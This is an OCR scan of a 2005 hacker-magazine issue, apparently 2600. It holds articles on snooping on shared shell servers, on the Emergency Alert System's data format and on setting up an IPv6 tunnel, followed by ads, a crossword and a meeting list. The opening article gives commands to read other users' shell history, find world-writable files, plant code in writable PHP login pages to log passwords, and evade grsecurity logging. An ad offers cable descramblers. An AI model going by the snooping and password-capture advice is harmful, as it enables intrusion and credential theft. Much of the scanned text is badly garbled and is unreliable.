won't work (but you never know). So where can you go from there? See if perhaps their .bash files are readable.
Is -1 /home/username/.bash-history Is -1 /home/username/.bashgrofile Is -1 /home/username/.bashrc

Just do it from localhost, not y o u r home system (if the user or sysadmin runs t h e "last" command it will reveal your I P address). I f t h e login i s unsuccessful, don't worry. There may be more t o look a t still. How about writable files and directories?
find /home/username/www -perm 0777 -print find /home/username/www -perm 0666 -print

Are any o f those readable (rw-r--r--)? Take a look at them. They may show some interesting information. Now here's where it can get interesting. Most shell servers will have a web server available for sharing out a personal web page. This directory w i l l likely be "/PublicHtml (you should have the same directory). But if you want t o be sure then
grep UserDir httpd.conf

httpd.conf can be located i n different places depending on the installation. Some common Locations are /etc/httpd, /etc/apache, /usr/ -local/apache/conf, or/var/www/conf or do.
ps ax


grep httpd


and it might show you t h e f u l l command line (/usr/sbin/httpd -f /etc/httpd/httpd.conf). Once you know the UserDir, guess what? That directory is world readable. Big deal, right? Well take the time t o poke a little further. Users are notorious

Play around with permission modes. 6 or 7 i n the last position i s what you're looking for. I f a user has a writable directory t h e n you can put your own files i n there. I f a user has a writable file like a php then you can put your own spyware i n t o the code t o let you know when users access the page or if it has a login form y o u can write code i n there t o write the user name and password t o a file for you t o collect later on. Whatever. Now be careful o f what you do. You are not allowed t o violate someone's privacy or destroy their content. Some linux administrators have gotten smart and used grsecurity's patches t o log a l l exec's from users so they can be alerted if some user i s running "find / -perm 0777". You w i l l get caught. So make sure t h a t y o u stay under t h e radar. Find out if t h e system i s a grsecurity kernel.
uname -a

Well, have fun poking around b u t don't do anything stupid.


by Tokachu

Inside the

Emeroency Alert System la
transmission, preserved i n eight b i t format:
ZCZC-WXR-HUW-03 71 83i0300 b-0661830-WXYZ/FM

The Emergency Alert System, commonly called EAS, originates from the FCC-mandated Emergency Broadcast System (formerly known as Conelrad), which was nothing more than a Long multifrequency tone generator and detector. Before the Kennedy Administration, such signals were only accessible for major networks and by the early 1990s the system was showing i t s age. Some cable companies resorted t o building their own unique alert systems using old phone equipment because the 30 year old system was, quite literally, falling apart. I n 1994, after three years of research and development, the FCC introduced what is now the modern EAS, and i n 1997 the system was made mandatory.


Network topology
The original EBS worked i n a daisy-chain fashion, where the authorities would notify one radio station, that radio station would notify another station, and so forth. The EAS works i n a hierarchical manner, where the notifying party (civil authorities, the National Weather Service, or Law enforcement) notify the largest station i n the area. From there, other smaller radio stations actually have a receiver hooked up t o the EAS encoder/decoder (the "endec") that listens for the big radio station, and the endec will cut i n t o the radio station's signal t o transmit at least three bursts of data along with the attention signal.

Data Format Il be brief i n the data format: it's FSK-en'l
coded (one tone is a mark, or "1" i n binary, and another tone i s a space, or "OM), which limits i t s transmission speed t o about 1200 bps. However, it operates at a very strange baud: 520.83 bps, or one b i t every 1.92 milliseconds. The space frequency is the bitrate multiplied by three (exactly 1562.5 Hz),,and the mark frequency is the bitrate multiplied by four (approximately 2083.3 Hz). Each byte is a regular eight b i t byte containing ASCII data (the most significant byte is ignored when receiving the data format), so it's very easy t o modulate data. The header consists o f 16 bytes with binary value "10101011". As the bitrate and transmission protocols are constant, there i s no need t o transmit bitrate calibration signals or mark/space information. Here i s a sample

The sixteen funny symbols a t t h e beginning i s the 16 byte header, along with another four byte header of "ZCZC" t o indicate ASCII data. "WXR" i s the notifying party (the National Weather Service, for this example). "HUW" i s t h e message code ("Hurricane Warning"), and "037183" i s the affected area, noted i n undashed FIPS 6-4 format. The first digit i s the region, which i s usually set t o "Nationwide" (0) and ignored; t h e second and third digits note the state (North Carolina), and the last three digits are t h e county number (Wake County). To store more t h a n one Location, the format might look like "############+", with each "######-" being a six digit location code and with t h e l a s t code ending with a plus rather than a minus symbol. The four digits after the plus symbol represent t h e length of time the alert i s effective for (exactly three hours i n this example). For the n e x t seven digits, the first three are a Julian-formatted date ("066" means the 66th day of t h e year, o r May 7th i n 2005). The last four digits are t h e starting time (6:30 pm). The next eight characters hold t h e call sign o f the radio station sending o u t t h e alert. It i s space-padded at the end, and any dashes i n t h e call sign are replaced with slashes. The message ends with a single dash. What i s n o t shown here i s t h e two-tone signal o f 853 Hz and 960 Hz, which must be emitted for a t least eight seconds after t h e data i s sent at least three times. From there, data with ,, * , ,,,,,,,,,,,,,NNNN" transmitted exactly three times acts as the signal for t h e end of the transmission. For some really detailed information, you should read document FCC 47 CFR 1 , 1 available on (http://fcc.gov).

I'm sure you're thinking something along the lines o f "if there's nothing t o authenticate or encrypt the information, what's keeping people from breaking i n t o machines a n d sending fake signals?" Well, there's a few t h i n g s you should know. First, most radio stations have a live person t o confirm whether or n o t t o forward any message received. Second, these machines are not hooked up like computers; they're placed


h o n g i d e transmission equipment, and are not hooked up t o any network or external computer (with the exception of video crawls i n television stations, but those still require manual intervention t o function). I t e l l you that every time I can hear that little "duck quack," Ido flip out, but even though I have a Legal obligation t o forward the message, I can call the radio station afterwards t o confirm it (and if it's fake, Ican break back into the radio circuit t o let people know). But let's say you happen t o get i n t o the radio station and get physical access t o the machine (which you won't) or happen t o somehow break into the remote transmission facilities t o interrupt the audio and use your own EAS endec (which you probably won't). The FCC can find you easily because you'd have t o be very close or inside the radio station t o pull such a task off. You would then be prosecuted and your message might not even be forwarded! The only vulnera1 bility I find is the f a d that the FCC mandates can that there be either a weekly or monthly test of I the EAS endec. Unfortunately, that means that a rogue attacker could very likely be able t o inject a test signal into a cable television network, which would not only interrupt one station, but every

station i n that area. This kind o f message would not result i n another "War of the Worlds" scenario, but would still result i n loss o f revenue by the television stations. Then again, a test only , lasts a few minutes and unless the attacker struck during the Super Bowl commercial break, the losses would be negligible. Il keep the door 'l locked, just i n case you get any ideas.


While it is very easy t o make a signal generator for the EAS, there i s no real use for it beyond t h e transmitter. I f you're daring, you could modify a radio packet program t o use the frequencies and bitrate of the EAS t o automatically log emergencies. Radio Shack used t o sell a radio scanner t h a t could tune i n t o FM stations and TV audio carriers and decode EAS signals for about 870 some time ago, although it might be a b i t more expensive nowadays. Nonetheless, until the EAS i s completely integrated into consumer appliances such as cellular phones, there is nothing t o worry about when it comes t o "breaking into" the system, and with the FCC collecting comments on the next generation o f the EAS, it w i l l probably be very stable and very secure i n the days t o come.


I P - V , L Redux
by Gr@ve-Rose Hello everyone. Since my last article touched upon an introduction t o the IPv6 protocol, I thought a nice follow-up article on how t o configure your network would be beneficial and some fun practice. Without further adieu, let's get down t o business.

My Network
As a point of reference, here is a (very) basic overview of my network at home. Frankenserver i s my Linux gateway, server, and basic a l l-in-one ' box running Red Hat EL3 and Checkpoint FW-1 NGFP4 R55 connected t o a 3Mb PPPoE connection. My main desktop P i s Alice and she runs C Mandrake 10.0 (2.6.3-7mdk vanilla). I have about five or six more computers but will only be focusing on Frank and Alice.

Tunnel Broker
I'm assuming that your current ISP does not offer native IPv6 connections. I f it does, you can

probably stop reading here! For the rest of us, we need t o establish an IPv6 tunnel with a tunnel broker. Tunnel broker's are organizations that will allocate you a network from their subnet that you can use. Some of the ones out there include Hurricane Electric (http://ipv6tb.he.net) and Hexago (http://www.hexago.com) as well as many others. I have used both o f the aforementioned but will focus on Hexago as I have had good service with them. Swing over t o the Hexago site and, at the top right of the page, select the "Get IPv6 i n 3 steps" link. Go through the short registration process and get t h e Linux TSP client a t t h e end. Save the TSP client on your border router (Frank for me) and uncompress it. Install it with the command: "make target=linux installdir=/usr/local/tspc i n ,stall" which will install the program i n /usr/ ,local/tspc.


Once you have installed t h e TSP client, switch to /usr/local/tspc/bin and edit t h e tspc.conf file. Here are the main things you will need t o have:

tsp-dir=/usr/local/tspc Location of the program auth-method=any Choose the best for us client-vd=auto Interface to peer with (external) userid= - Username passwd= - Password template=linux - Using Linux, right? server=broker.freenet6.net Used for logging in retry_delay=30 - 30 second retries tunnel_mode=v6anyv4 - Leave this as it is if-tunnel-v6vd=sitl - Leave this as it is if-tunnel_v6udpv4=tun - Leave this as it is proxy-client=no We are not a proxy server keepalive=yes - Always a good idea keepalive-interval=30 30 second keepalive host-type=router - We are a router prefixlen=48 - Obtain a 148 subnet if-prefix=ethO Internal network card





Once you have configured this, save the file and run the command: "./tspc -f ./tspc.conf -wv" and you should see the transaction take place. Any error messages you see if it fails are most likely i n the Hexago FAQ pages. Check there for more help. Run an "ifconfig -a" and you should now see your sit1 interface with a 1128 subnet (our tunneling mechanism) and ethO should now have a global-unicast I P address starting with 2001: with a /48 subnet. Client Configuration Head on over t o your desktop P (Alice, i n my C case) and, if you're running a kernel pre-2.6, run "insmod ipv6" t o install the IPv6 module. Wait for a few moments and then run an "ifconfig -a" and your ethernet adapter should now have its own global-unicast (2001:) I P address. How did this happen? Well, the TSP client also works as radv(d) which will advertise I P addresses for configuration. Cool, eh? Now, let's add DNS resolution. Technically, any DNS server can give you an A6 record (dig -t AAAA servername.com) but we want t o make sure of this. Open /etc/resolv.conf and add the following t o the top:
options inet6 nameserver ,2001:238: r l

Yes, that is a valid IPv6 nameserver (at the time of this writing). Once this i s done, we should move on t o the security portion Security Considerations This is where things get tricky. I'm running Checkpoint Firewall-1 and, although it does support IPv6, not a l l features are available yet. As such, Ihave had t o make some modifications t o both Alice and Frank. First off, Ihad t o allow the Hexago IPv4 server t o access Frank's IPv4 unrestricted t o allow


\ for different ports which may b e used i n the 6over4 tunnel. Because o f this, I performed a security audit on Frank t o ensure t h a t t h e only services Listening are t h e ones I want t o have running. (This i s good practice anyway.) Right now, only HTTP(S) and SSH are Listening on IPv6. Second, although Checkpoint does support IPv6, it currently struggles with s t a t e f u l inspection o f tunneled traffic for IPv4 and IPv6. This means t h a t anyone can access any o f t h e globalunicast I P addresses I've been assigned. I n layman's terms, Alice's IPv6 i s unprotected. A quick "netstat -na I grep \:\:" revealed only SSH lis wtening on :::22. Hacking /etc/ssh/sshd-config and changing the Listenports t o :1 and :, followed by a "service sshd restartH worked properly. Now the only service on Alice Listening on IPv6 i s SSH Listening on t h e loopback interface only. Lastly, Icreated my IPv6 objects within t h e SmartDashboard of Checkpoint ([6]-Alice-v6 --host-node, [6]-Frank-ethO-host-node, [6]Frank-sitl-host-node and [= 1 -]-Internal-v6-network) and allowed my Internal-v6-net -work out without limitation. Testing If everything has gone correctly, you should be able t o ping6 sites. Try "ping6 www.kame.net" which should return from orange.kame.net. I f DNS, doesn't work, their I P address is: 2001:200:0:8002:203:47ff:fea5:3085. How about websites? The best o n e t o test with i s http://www.ipv6.bieringer.de/ because you can onlyaccess it from an IPv6-enabled machine. IPv4 browsing w i l l return a Bad Gateway error message. What's really interesting t o see are t h e actual packets going back and forth. Isuggest using Ethereal but even tcpdump w i l l show you t h e IPv4 addresses followed by the (un)encapsulated IPv6 addresses. Fun stuff! Conclusion I hope t h a t this article has helped you on your way t o learning more about I P v 6 as well as how itfunctions. I have some documents floating around on the web about IPv6 so if you can track them down, they should help y o u out as well. Take a look at different websites o u t there and, bundled with t h e inquisitive nature I ' m sure you possess, you'll be flying v6-style i n n o time! Shouts: ChlxOr, phoneboy, B o b Hinden, David Kessens, TAC-Kanata, elligirf, anyone I may have missed, and o f course, eXoDuS (YNBABWARL ) !

5 7 '

I Happenings



SUMMERCON 2005 PRESENTS: TOOLS OFTHE TRADE. Come one, comeall! Hackers, phreakers, phrackers, feds. 2600 shock troops, cops. "security professionals.' U4EA. rOOt kids club, orerr, arouoier. conference whores. kOd3rr. convicted 'eon%. concerneo parcnrr. an0 teachpi5. Iiackrrr an0 oeer col Ioe far tne lecnnocd fpre'nnt rne propnets narneo yo. aoodr. J.neL-6 n A-st n Tekar. Omnl A L I ~ no'el Onrnrann. 100 San Jaolrro at Rtn i l r e ~ t Atown. TX 78701 For mare . ~nformahan, t-shirts, registration, and much more: http://www.summercon.org Pre-reaiiter now! CAROUNACON 2005. h n e 10-12 at the Ra eiqn AmeriS~irerhotel. A d m ~ ~ r i a n SI5. Confc~mce for t h na.eI room5 aial aole at rara.lnacon arg. Speaxerr rate ~ welcome. WHAT THE HACK! Timer have changed: Terrorism, metal detectors, special new laws, and our leaders getting ever closer to their dream of "knowing it all." It's been a cram almost four vears since the last hme all the tribes of the hacker univFrlP cdmpeo 0-1 ~nTnp heIner anor at hA.2001. nlqn n ? e t o qe'togrlner, meet. r e f ~ m 1ho6 0.r prolec$, nrlo alsc .r$ our loerr ho matt?, rherner )o. re into . figuring autwhat they're up to, doing something about it, or having a good time with some of the smartest and funniest people we know of, come to What The Hack, July 28-31, near Den Borch. The Netherlands. For more informahon, visit http://whatthehack.org. INTERZONE GOES WEST! While the Atlanta Interfine stays hacker can, InterzoneWest will be a more professional style LT. conference, carrying on i n the tradition of "effecting change through education." Along with InterzoneWest, GRAYAREA the nan- traditional recuritv academv - w i l l be haooenino. teachina . . .. methodologies and rkillr instead of test answers! San Frannsco Bay Area In early October 2005. See inten0ne.com or grayarea.info for the latest detalls.





SPAMSHIRT.COM take same roam and out it on a t-shirt. Now available i n the . , US.! www.rpamshirt.com. CHECK OUT JEAH.NETfor reliable and affordable Unix shells. Beginners and advanced urerr love JEAH's Unix shells for performancedriven uptimer and a huqe list of Virtual Horts. Your account lets you store data, use IRC. SSH, and e m a i l k t h camolete anvacv and recuntv. JEAH also offers fast and stable hortino for voui ,web rlte, plus theability to register and manage your own domain name. All at compehtive prices. Special for 2600 subscribers: Mention 2600and receive very" ' setup fees waived. Look to www.jeah.net for the exceptional service and attention




I 1

g E F d : h DOWNli'Mf ON DVD! Years i n the makina but we hone it was worth the &a#- A co.0.r OvD IP~ t l a t lntIJOe5 the two no., oocdmsntary, an in-depth tnrer. w e w m,n < e m Murlrr. an0 nra.0 :hree hour$ of extra scener. or1 faorage. and ml,ceI nnml.5 st .ff P *.I capnonlng for 20 (1b111 nor-I. 20) lanq~aqes,<o.nnwntar" track, and a lot of thinqs you'll iust have to find far vourrelf! The entire two dis; set can be had bv rendhd$30 to Freedom O o w n t i m e " ~ ~O .Box 752. Middle P~ * . Island NY 11953 IlSAar buardetino from our online stare at --, http://store.2600.com. (VHS copier of the film rhllavailable for $15.) NETWORKINGAND SECURIPI PRODUCTS available at OvationTerhnology.com. We're a Network Securitv and Internet Privacy conrultinq firm and supplier of oetworking hardware. Our online stare f e a t u r e r ~ ~ ~ and firewall hardware, wirelelr hardware, cable and DSL modems/routers, IP access devices. VoIP products. parental control products, and ethernet switches. We pride ourselver an prwiding the highest level of technical expertise and customer ratisfactton. Our commitment to you ... No surprises! Easy returns! Buy with confidence! After all, Security and Privacyis our burinerr! Virit us at http://www.0vationTechnology.com/store.htm. ONUNE SERVICES. Web hostina. cheao domains, areat dedicated sewers. SSL , . rertr, an0 a 51 r o r c Lnccx odr w*.hoQ4 com HACKER LOGO T-SHIRTS AND STICKERS. lnorc ' ~ the rnow' recognize Thp r G 8oer as tne new kacrer -090. T-qrlr.. anfl 5r#r*er$rm?lazoned m l h tne nac*e# Logo can be found at HackerLogo.com. Our products are tap quality, and will visuall" associate vou as a member of the hacker culture. A oartion of the oroceedr oo ro ruppor tne E wfranlc Frontier Foundanon l l r l t ur a' ~vwwHacrerloqo con PHRAlkE. I r e ret-nno og) 6 r r n n ~ the !#n#\eq.arrer *a-.C we to t r a m tne t 2600 readers who have also become new rubrctibers and encourager those who have not ACK their need for diverre computer information i n conjundon with that of 2600 to ded~cate some oackets and become a ~ ~ b s c t i btodav! V ~ l us at our er t new domain www.pearlyfr~eprerr.com/phraine. HACKER T-SHIRTS AND STICKERS at JinxGear.com. Stop running around naked! We've got new rwagalinaus t-rh~rts, stickers. and miscellaneous contraband coming out monthly including your classic hacker/geek designs, hat-short panties, dog shirts. and a whole mess of kickarr stickers. We also have LAN oartv lirhnar. n a c w con'errr~pI!5nngs. mellaqe~orbmr,a pnato cat er), an0 m0n.n y conterrr. he1 oonr ern biy. 125: r gn or tne ma) 8ng Irr an0 have a m a w e ra win five t r ,If_ 01 101 OY. tne easy ~nlt.,rno-I 10 get a frer sucrer. Grr 11n l at wwwJinx.cam! PHONE HOME. Tiny, sub-miniature. 7/10 ounce, programmable/reprogrammable touct-tone multi-freo~nl*. , , IDTMn dialer which can store uo to I 5 touch-tme , o\qtrc .n#+ Ir ne o aqamr the teleonare rerelver s mlrwphone for olalmg Prerr nOUE to a~toma!#cay dla rne :tore3 Oigit~ ani+ can :"en ne hear0 :nro .qn


1 1 oltr,? I I ~ I ~ I ~ ~ I L ~ I C 'i 1 < r t ~ ~ l d ,A l! z t, ~ c ~I C ~ ~# I~, ,cIh\1 ~ >p<,,>k~~ Itleal frm ~ ~ V ~ ! ! ~ doqr/rhlmpr. rignlflrant others. hackers. and computer wlisrds. blvp one to a bay/g>rlfi~end to that poten6al"iomeone"you meet at a party, the supermaror ket, school, or the mall: with your pre-programmed telephone number, he/rhe will always be able to call you! Also, ideal i f you don't want to "disclose" your telephone number but want someone to be able to call you locally or long distance by telephone. Key ring/cbp. Limited quantity available. Money order only. $24.95 + $3.00 SIH. Mail order to: PHONE HOME, Nimrod Division. 331 N. New Ballar Road. Box ~10RO2CRC M8ssOdn 631-1 LEARN LOCK PICKING I t r EASYrvlrh our nook an0 nevr vloca The 2na edltlan boa. aeor otr mare Intcre5nnq matenal an0 11I t r r a t ~ o n ~ P tne ndeo 8s f l l eo *h# with computer graphic cutawayviews. Learn what they don't want you to know. Any security system can be beaten, many timer right through the front door. Learn the secrets and weakness of today's locks. I f you want to get where you are not supposed to be, thir book could be your anrwer. Explore the empowering world of lock . aickino. Send twentv bucks for the book or video to Standard Publications. P O . Box 2?76hO. Champalgr I 6i825 or mrlr .I at muw.rranaa.opLh Iranan5 ram/ . -dvect ?hOO nrrrl fa yo,, 2600reaorr pnce axco .nr FlLE TRACKING SOFWARE: FI eAcra.ntan:(TM) Wlnoour XPana ater Crearer a Irt of fVer an yo., naro crl,e. R.8" 11brl0.e and afre. lnrla Ibng ne* prooucr ano/o dpoarer to ol<car*r r n x n f ler areanoPo mange0 oe nco. Prnr ti$.r. Mher features. Mare information at: hap://abi~tybusines~~ompute~~eNice~.~om/fa.html or fa.info@abilityburinerr ~computerrelvicer.com. SIZE ODES MATIER! TheTwin Towers may be gone forever but a detailed image still ekisb of the massive 374-foot radio tower that war perched atop One World Trade Center. Thir high-quality glorry color poster i r available i n two riles (16" x 20" and 20" x 30") and maker a spectacular gift for engineers, scientists, radio and television buffs, or anybody who appreciates a unique, rarely seen view of the World Trade Center. Visit www.wtc-p0ster.u~ for samples and to order your own porter. CABLE N DESCRAMBLERS. New. (2) 199 + $5.00 shipping. money orderjcarh only. Works on analog or analog/digital cable systems. Premium channels and posriblv PPV deoendina on rvrtem. Comolete with IlOvac Dower ruoalv. Purchaser arrum& role iesponr;biliGfor notifyin'g cable operator df use of der;rambler. Requires a cableTV converter (1.e.. Rad~o Shack) to be used with the unit. Cable connects to the converter, then the dercrambler. then the output goes t o TV set tuned t o channel 3. C 9621 Olive, Box 28992-TS, Olivettet Sur, M?rrauri63132. O Email: cabledescrambIerguy@yahoo.com. DECEPTION. The Pine Lake Media Group is pleased to present t o you our debut releare. Decelrtion, bv award-winnino newsmax.cam columnirt Charles Smith. Manv . . citizens think they know what their government is doing i n their names. After reading Deception, you'll see just how bad it really is and how little you really know. Deception is the true story of the greatest Chinere Army espionage operational exoloit aaainrt the United Stater. Based on a decade of research and more than 50.000 paqer of offloa. an0 r.a$?#f#ea ooc.rrentr onratneo urwg rne Freedo- Of Informarlon An, no o r n v o o c ~ p->llrn~cto .a+? even <omparer to llereption. While many books have "gone after" presidents before, Deceptionis unique because we've included all of the evidence backino uo our charoer. We have the * , signed letter from Motorola CEO Gary Tooter thanking Ron Brawn, farmer United States Commerce Department Secretary, for the presidential waiver allowing the exoort of encrvpted police radios to China. And nearlv 100 other unmodified. unemoel >rheaoocimenl< Ihat nnmp "amp<. Orner your cop) tooay f o r ac0,no.a in. forwarlon a*o to ororr, p ra5Qn v t or ~ e b r l r at . m a pme aeemeola con or ca I . r ROO-799-4570 or (61s) 275-OR3O. P ea5e note tnat re cannot accept oraerr oy teteohane at this time. Credit card orders ma" be faxed to 800-799-4571 or (514) , 27510829. We accept all major credit cards, checkr, money orders, Liberty Dollars. electronic checks, and good old fashioned cash. We ship worldwide by DHL or USPS. CAP'N CRUNCH WHISTLES. Brand new. onlv a few left. THE ORIGINAL WHISTLE i n mint condition, never used. Join the elite few who own thir treasure! Once they are gone, that is it - there are no more! Keyrhain hole for keytinq. Identify yourself at meetings. etc. ar a 2600 member by dangling your keycham and saying nothing. Cover one hole and get exactly 2600 hz, cover the other hole and get another frequency. Use both holes to call your dog or dolphin. Also, ideal for telephone remote control devices. Price includes mailing. $99.95. Not only a collector's item but a VERY USEFUL device to carrv at all timer. Carh or monev order 0°C.Mail to: NrllS1.E. PO. Rax 11567-ST. 1. qirrarn 63105. HOW TO 8 ANONYMOUS ON THE INTfRNkl. fa%$ fn low trson5 an arhwnng E to Internetanonymity, privacy, and security. The book's 20 chapters cover 1) simple proxy use for W : 2) how to rend and receive e-mail anonymously: 3) use SOCKS W prones for IRC, ICQ. NNTP, SMTP, HTTP: 4) web based proxies - JAP. Multiproxy. Crowds: 5) do-it-yourself proxies - AnalogX, Wingater; 6) read and post ~n "emO~OUDI (Usenet) i n complete privacy: 7) for eav proxies. Learn how to hunt for. flno. an0 .rl 1zea.l ryper of proxler, clean up y0.r baurers. clean .p yo., m o l e Nbnoo~rO This proferriona'.y m n c n 0.t non.tecnnlca.~arqor~f l lea book Ir S geared towards the beginner to advanced readerr and the average Internet user. The book lessons are on a C i n easv to read HTMLinterface format with numerous D illustrations throughout. Send $20 (I'll pay S/H) to Plamen Petkov. 1390 E Vegas Valley Dr. #40. tar Vegas. NV 89109. Money orders, personal checks, cash accepted.
< ~



Across 1.Hackersauniv. 3.Legion of 6.Usenet starter 9,Dir for Unix 10. Bad on a boarding pass 13.CPU, ROM, eg. 14.Independent fortress phone 18.2.4Ghz transmission 19.Multics successor 21.Early net. 24.Telco wire inits. 25. GUI predecessor 26.2600 build 28. Popular distribution 31. Some hackers break these 33. White House zone (abbr.) 34. Otwell's farm 35. Meeting space 36. Framer of the manifesto 39. Old Baby Bell 41. Net hell? 42.Stood up to the MPAA 44. What 2600 repainted 47. Cow plus yak 48.ALGOL - Latin similarii 49. Once 10562 50. Do not overtlow this 52.The stage for Hackers 53.Cult's Blood 54. Conference Keynoter 55. Cx Cc

Down 100010101100 Social engineering must Back-up media (abbr.) Platform (abbr.) Degree of achievement for some hackers 7. Common 8. Class 4 CO 11. Quarterly hundreds digit 12. Open source guru 15. Bandwidth meas. 16. Flash 17. Off The Hook theme 20. 212, 718 e.g. 22. P2P enemy 23. Much of spam 1. 2. 3. 4. 5.

27. 29. 30. 32. 36. 37. 38. 40. 41. 43. 44. 45. 46. 47. 48. 51.

MOD'Smark? Pen reg. Early scene zine WWll Ohio shortwave sta. Chinese TLD What pine is not Phrack founder String oriented symbolic language Military secondary Marching orders? (abbr.)

Future armies (acro.) Old Macintosh 2200+1700*2 3110 to Telenet (abbr.) Suffix deserving death?

l~ould you prefer it if people didn't see you lbuying it at the bookstore and follow you after you leave the stog?

There's a

2600 Subscription and yours in couple II o f It's called t h esend $20 for one year. it can betwo years.a o r $52 ways. Either $37 for

soluki 84%

\ &> g

I for three years (outside t h e U.S. and Canada. that's $30, $54, and 1675 respectively) t o 2600, PO Box 752, Middle Island. NY 11953 I USA or subscribe directly from us online using your credit card a t


Theoretically you would never have t o leave your house again.



many people ask us just how,

These are the rules.11 entnes must

many Easter Eggs there are i n the Freedom Downtime DVDs t h a t / / we've decided t o make a contest out of it. I f vou find the/\ber 1, 2005 and t h e winner ill b e / announced i n the Fall 2005 issue. highest number of Easter Eggs i n this double DVD iet, you'll win What constitutes an Easter EaaI 1 / t h i n g on the DVDs that is deliberG:ly hi;the following:


den i n some way so t h a t you get a Little

I / thrill when you discover it. When you find

one of these, we expect y o u t o t e l l us how n l i f e t i m e subscription t o 2600 you found it and what others must do t o ALL back issues see it. Simply dumping t h e data on the DVD 1 11 is not sufficient. 1 \One item o f every piece of clothing we sell j 1 It's possible that there are some Easter f"IAn O f f The Hook DVD with more possible Easte r Eggs Eggs that don't require you to hit buttons rl~nother Freedom Downtime DVD since you wr i l l have i but that contain a hidden message1 nonetheless. For Instance, i f you dlscover probably worn out your old one that tahng the first l e t t e r of every word' that Kevin Mitnick says i n the f l ~ m spells TWO tickets t o the next HOPE conference . out a secret rnessaoe bv aLL means ~nclude
< ,


Submit entries to: Easter Egg Hunt c/o 2600, PO Box 752, Middle Island, NY 11953 USA t h e above address or through our Internet store located a t

You can get t h e Freedom Downtime double DVD set by sending $30 t o

\ store.26OO.com.


that. We will be judging entnes on thor-' oughness and there is no penalty for seeing ~~~t~~ that isn't you can an E~~ there. enter as many times as You wish. Your best score i s the one that will count. Remember, there is no second place! So plan on spending the next few months




M@ElWNA In the bar at Sandgp(K. AUSTRALIA Adelaide. At the payphoner near the AcaSemv Clnenia on Pullenev St 8 pm. Brirbane: Hunsry Jacks on the aueen S t Mall (RHS, opporitelnfo Booth! 7 pm Canberra: KC'S VirtualReabty Cafe. 11East Buenos Ai*:


FRANCE Awgnon: Bottom of Rue de la Republique in front ofthe fountain with the flowers. 7 pm. Gremlble: Eve, c a w of St. d'Hrre; Pans: Place de la Repi~bllque. (emot\il $(ountain.6 pm.


R. l a u d d a l e : Broward HBU in the food court 8 pm. neruillr: in the o i the &rt :iy lorlda'i Reltl Uni<>n food court 6 pm ando: Farhlon Square Mall Food Court ween Hovan (,ourmet and Miinthii Wok 6 pm.


North Carollna Charlotte: South Park Mall food court. 7 pm. fmtnsborNBIBFRock Cafe, ! dLv & Shopping rcilte, 6 pm. Raleigh: l p k Cafe And Intrlnet Garnlng -* Ceotir. Royal rill 3801 Hilkbarough5 b pm. : Wilmington: Indepeodenr~Mall food


RW. Civic. 7 pm.
Melbourne: Caffeineat Rwault bar. 16 Swaniton Walk. 6 pm. Perth: The Merchantlea and CoffeeHo~3e. 183 Murray St. 6 pm. Svdnev: The Crvrtal Palace, front . . . barjbirtro, opposite the bur station area an George Street at Central Station. 6 pm. AUSTRIA Gnz: Cafe Haltertelle on Jakominipla+z. BRAnL Belo Horizonte: Pelego's Bar at Assufeng. near the payphone. 6 pm. CANADA AlbCIta Calgary: Eau Claire Market b o d cwrt by the bland yetow wall. 6 pm. British Columbia Nanaimo: Tim Horton'r at Camox 8 Wallace. 7 pm. Victoria: W Bakery and Cafe. 1701 Government St. Manitoba Winnipeg: St. Vital Shopping Centre. food court by HMV. New Brunswick Moncton: Ground Zero Networks Internet Cafe, 720 Main St. 7 pm. Ontalio Barri~ William's Coffee Pub. 335 Bryne Drive. 7 pm. Guelph: William'r Coffee Pub. 492 Edinbourgh Road South. 7 pm. Hamilton: McMarter University Student Center. Roam 318.7:30 pm. Ottawa: World Exchange Plaza, 111 Albert St., second Raor. 630 pm. Toronto: Future Bakery. 483 Bloor St. Wen Windror: Univerrity Student Center by the large window. 7 pm. Quebec Montreal: Bell Amphitheatre, I000 GauchetiereStreet. CHINA Hans Kong: Pacific Coffeein festival Walk. Kowlwn Tong. 7 pm. UECH REPUBUC Prague Legenda pub. 6 pm. DENMARK Aalborg: Fan Eddy'r pool halL Aathur: In the far corner of the DSB cafe in the railway station. Copenhagen: Ved Cafe Blaren. Sonderborg: Cafe Druen. 230 pm. E m Port L i d : At the foot of the Obelisk (El Missallah). ENGUND Brighton: At the phone boxer by the Sealife Centre (scrarr the road from the Palace Fier). 7 pm. Payphone: (01273) 606614. Fxetcr: At the payphoner. Bedford Square. 7 pm. Hampshire: Outride the Guildhall Portsmouth. Hull: The Old Gray Mare Pub, opposite Hull University. 7 pm. London: Troedero Shopping Center (near Picadilly Circus). lowest level. 6 3 0 pm. Manchcrter: The Green Room on Whitworth Street 7 pm. Nowich: Main foyer of the Norwich "Forum" Library 5 3 pm. :0 Reading: Aho Bar, Merchants mce, off Friar St. 6 pm. FINLAND Hcln'nU: Fenniakoltteli food court


(Vuo"btu 14).

Rennes: I n front of the store 3 l u e Box" Tampa: University Mall in t h e back of the close t o the place of the Repubbc. 7 Pm. food court on the 2nd floor. 6 pm. GREECE Georgia Athenr: Outsidethe bookstore Atlanb: Lenox Mall food court. 7 pm. Pa~arwtiriou the corner of Patirion and an Idaho Stourman'. 7 pm. Boise: BSU Student Union Building, upIRELAND stairs from the main entrance. Payphaner: (208) 342-9700.9701. Dublin: Atthe phone booths on Wicklow Street besideTower R~mfds.7 Pm. Pocatello: College Market, 604 South 8th ~ L Y Street. Milan: Piazza Loreto in hont of McDonalds. Illlnois JAPAN Chicago: Union Station i n the Great Hall Toltyo: Linux Cafe in Ahhabara district. near the payphanes, 5;30 pm. 6 pm. Indiana NEW ZElLAND Evansville: Barnes and Noble cafe at 624 S lucklsnd: London Bar, u ~ r t a i n . Wellesley G~~~~ ~i~~~ ~d. St., Auckhnd CentraL 5:30 pm. Ft. Wayne: Glenbrook Mall food court in Christchurch: Java Cafe, corner of High front of Sbarrosr. pm, St. and Mancherterst. 6 pm. W Indianapolis: Corner Coffee, S corner of Wellington: Load Cafe in Cuba Mall. 6 pm. and Alabama, NORWAY South Bend (Mishawaka): Barnsand Oslo: Oslo SentralTrain Station. 7 pm. Noble 4601 GrapeRd, Tromrse: The upper floor at Blaa Rock Iom Cafe. 6 pm. Amer: Santa Fe Erprerro. 116 Welch Ave. Trondheim: Rich Cak in Nardregate. 6 pm. Kansas SCOTLAND Kansas City (Overland Park): Oak Park Gbsgov: Central Station, payphoner next Mall food court. to Platform 1. 7 pm. Wichita: Riverside Perk, 1144 Bitting Ave. SLOVAKIA Louisiana Presov City: Kelt Pub. 6 pm. Baton Rouge: In the LSU Union Building, SOUTH AFRICA between the Tiger Pause 8 McDonald's, (Sandton City): Sandton next to the payphoner. food court 6 3 0 pm. New Orleans: La Fee Verte. 620 